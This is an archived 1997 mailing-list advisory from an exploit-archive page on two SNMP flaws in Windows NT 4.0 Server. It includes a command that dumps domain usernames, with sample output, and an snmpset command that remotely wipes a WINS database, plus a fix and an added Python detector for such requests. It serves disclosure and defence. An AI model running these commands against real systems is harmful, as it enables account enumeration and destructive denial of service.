SNMP holes in Windoze NT 4.0
Description: One bug described allows you to dump all domain usernames with snmpwalk. Another allows you to delete WINS database records remotely. Micro$oft is pathetic. Nobody should buy their products. Get Linux, or OpenBSD, or Solaris.
Author: "Rouland, Christopher J" <CRouland@EXAMNYC.lehman.com>
Compromise: Determine usernames, potential DoS
Vulnerable Systems: Those running WindoZe 4.0 Server with SNMP
Date: 8 October 1997
Date: Wed, 8 Oct 1997 19:08:37 -0500
From: Aleph One <aleph1@DFW.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: SNMP Insecurity
---------- Forwarded message ----------
Date: Tue, 7 Oct 1997 15:36:13 -0400
From: "Rouland, Christopher J" <CRouland@EXAMNYC.lehman.com>
To: "'ntsecurity@iss.net'" <ntsecurity@iss.net>
Subject: [NTSEC] SNMP Insecurity
All:
I have found two significant "features" in the SNMP agent
implementations under NT 4.0 Server, and I am sure there are more if I
feel like really digging. The first issue I sent in earlier this year
to Microsoft and received no response other than "expected behavior" and
the second I just found and puts any large NT shop at a serious denial
of service (DOS) risk.
1. This first exploit demonstrates the ability via SNMP to dump a list
of all usernames in an NT domain (assuming the target box is a DC) or on
an NT Server.
Here is the simplest NT example I could find to use this:
C:\NTRESKIT>snmputil walk <hostname> public .1.3.6.1.4.1.77.1.2.25
<hostname> should be a domain controller or server
Sample output at end of message.
2. The second exploit demonstrates the ability via SNMP to delete all of
the records in a WINS database remotely, bypassing all NT security. If
you understand large scale WINS architecture, you can understand the
implications of this. Knowledge of SNMP community strings would allow
an attacker to effectively shut down any large NT infrastructure with
"N" commands (N=number of WINS servers). This is permitted due to the
extensive "cmd" set implemented in the WINS extension agent,
specifically:
cmdDeleteWins OBJECT-TYPE
    SYNTAX IpAddress
    ACCESS read-write
    STATUS mandatory
    DESCRIPTION
        "This variable when set will cause all information
        pertaining to a WINS (data records, context
        information to be deleted from the local WINS.
        Use this only when owner-address mapping table is
        getting to near capacity. NOTE: deletion of all
        information pertaining to the managed WINS is not
        permitted"
    ::= { cmd 3 }
Since the SNMP toolset implemented under NT will not do
snmp-set-requests, my sample exploit was done using the CMU SNMP
development kit under Unix. The command
rnjdev02:~/cmu$ snmpset -v 1 192.178.16.2 public .1.3.6.1.4.1.311.1.2.5.3.0 a 192.178.16.2
successfully entirely deleted my WINS database.
3. It appears that there are several other pieces of the LMMIB2
definition that allow for things such as remote session deletion or
disconnect, etc, but I have not yet looked into them.
4. The simplest fix is to disable SNMP, or to remove the extension
agents through the SNMP configuration in the registry.
Regards,
Chris
--
Chris Rouland
Lehman Brothers, Inc.
crouland@lehman.com
-----
C:\NTRESKIT>snmputil walk 192.178.16.2 public .1.3.6.1.4.1.77.1.2.25
Output:
Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.71.117.101.115.116
Value = OCTET STRING - Guest
Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.49
Value = OCTET STRING - test1
Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.50
Value = OCTET STRING - test2
Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.51
Value = OCTET STRING - test3
Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.52
Value = OCTET STRING - test4
Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.53
Value = OCTET STRING - test5
Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.54
Value = OCTET STRING - test6
Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.55
Value = OCTET STRING - test7
Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.56
Value = OCTET STRING - test8
Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.57
Value = OCTET STRING - test9
Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.6.116.101.115.116.49.48
Value = OCTET STRING - test10
Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.8.116.101.115.116.117.115.101.114
Value = OCTET STRING - testuser
Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.13.65.100.109.105.110.105.115.116.114.97.116.111.114
Value = OCTET STRING - Administrator
Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.13.73.85.83.82.95.82.78.74.68.69.86.48.49
Value = OCTET STRING - IUSR_NT4SRVDEV1
Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.19.83.81.76.69.120.101.99.117.116.105.118.101.67.109.100.69.120.101.99
Value = OCTET STRING - SQLExecutiveCmdExec
End of MIB subtree.
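As an added example (not part of the original message or of any Microsoft tool), the following Python decodes the svUserName row index shown in the walk output above and labels the two request shapes the message describes (a walk of the LanManager user table, a Set on cmdDeleteWins) so a defender can flag them in SNMP request logs. The function names, the one-line joined form of the sample output and the (pdu_type, oid) request abstraction are assumptions.

```python
# Added example, not part of the original post: decode the svUserName instance
# index in the snmputil output above and label the two request shapes the
# message describes, so they can be flagged in SNMP request logs.
import re

LANMGR_USER_TABLE = "1.3.6.1.4.1.77.1.2.25"   # svUserTable walked in item 1
WINS_CMD_DELETE = "1.3.6.1.4.1.311.1.2.5.3"   # cmdDeleteWins set in item 2

# Constructed sample in the same shape as the walk output above.
SAMPLE_WALK = """\
Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.71.117.101.115.116
Value = OCTET STRING - Guest
Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.13.65.100.109.105.110.105.115.116.114.97.116.111.114
Value = OCTET STRING - Administrator
End of MIB subtree.
"""

def decode_index(oid_text):
    """Recover the username from an svUserName row index: one length
    sub-identifier, then one sub-identifier per byte of the OCTET STRING."""
    nums = [int(n) for n in oid_text.split("svUserName.", 1)[1].split(".")]
    length, octets = nums[0], nums[1:]
    if len(octets) != length:
        raise ValueError("index claims %d octets, found %d" % (length, len(octets)))
    return bytes(octets).decode("latin-1")

def parse_walk(output):
    """Return (name_from_index, reported_value, consistent) for each entry."""
    entries = []
    for var, val in re.findall(r"Variable = (\S+)\s*Value = OCTET STRING - (\S+)", output):
        name = decode_index(var)
        entries.append((name, val, name == val))
    return entries

def in_subtree(oid, subtree):
    """True when numeric oid is at or below subtree (whole sub-identifiers only)."""
    o, s = oid.strip(".").split("."), subtree.strip(".").split(".")
    return o[:len(s)] == s

def classify_request(pdu_type, oid):
    """Label the two risky request shapes from the message, else None."""
    if pdu_type in ("GetNext", "GetBulk") and in_subtree(oid, LANMGR_USER_TABLE):
        return "lanmgr-user-enumeration"
    if pdu_type == "Set" and in_subtree(oid, WINS_CMD_DELETE):
        return "wins-database-delete"
    return None
```

The consistency flag from parse_walk is useful when reviewing captured walks: an index that does not decode to the reported value means the output was edited or truncated.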
This page is part of Fyodor's exploit world.